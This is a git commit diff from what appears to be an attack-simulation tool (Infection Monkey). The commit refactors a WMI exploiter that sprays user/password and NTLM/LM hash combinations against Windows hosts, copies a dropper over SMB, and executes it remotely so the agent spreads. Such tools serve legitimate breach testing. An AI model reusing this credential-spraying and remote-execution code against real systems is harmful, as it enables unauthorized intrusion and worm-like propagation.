Agent: decouple wmiexec.py from WormConfig object

This commit is contained in:
vakarisz 2022-03-08 14:56:22 +02:00
parent d7e222c8a8
commit c932a19b47
3 changed files with 29 additions and 20 deletions

View File

@ -151,20 +151,6 @@ class Configuration(object):
"""
return product(self.exploit_user_list, self.exploit_ssh_keys)
def get_exploit_user_password_or_hash_product(self):
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list):
cred_list.append(cred)
for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]):
cred_list.append(cred)
return cred_list
@staticmethod
def hash_sensitive_data(sensitive_data):
"""

View File

@ -52,6 +52,7 @@ class SmbExploiter(HostExploiter):
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
# TODO extract the method in wmiexec.py
creds = self._config.get_exploit_user_password_or_hash_product()
exploited = False

View File

@ -2,13 +2,14 @@ import logging
import ntpath
import socket
import traceback
from typing import List
from itertools import product
from typing import List, Mapping
from impacket.dcerpc.v5.rpcrt import DCERPCException
from common.utils.exploit_enum import ExploitType
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.helpers import get_monkey_depth
from infection_monkey.exploit.tools.smb_tools import SmbTools
from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
@ -28,7 +29,7 @@ class WmiExploiter(HostExploiter):
@WmiTools.dcom_wrap
def _exploit_host(self):
creds = self._config.get_exploit_user_password_or_hash_product()
creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
for user, password, lm_hash, ntlm_hash in creds:
creds_for_log = _get_credential_string([user, password, lm_hash, ntlm_hash])
@ -83,20 +84,20 @@ class WmiExploiter(HostExploiter):
password,
lm_hash,
ntlm_hash,
self._config.smb_download_timeout,
self.options["smb_download_timeout"],
)
if not remote_full_path:
wmi_connection.close()
return False
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
self._config.dropper_target_path_win_32,
self.options["dropper_target_path_win_64"],
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
@ -139,6 +140,27 @@ class WmiExploiter(HostExploiter):
return False
def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List:
"""
Returns all combinations of the configurations users and passwords or lm/ntlm hashes
:return:
"""
cred_list = []
for cred in product(
credentials["exploit_user_list"], credentials["exploit_password_list"], [""], [""]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], [""], credentials["exploit_ntlm_hash_list"]
):
cred_list.append(cred)
for cred in product(
credentials["exploit_user_list"], [""], credentials["exploit_lm_hash_list"], [""]
):
cred_list.append(cred)
return cred_list
def _get_credential_string(creds: List) -> str:
cred_strs = [
(creds[0], "username"),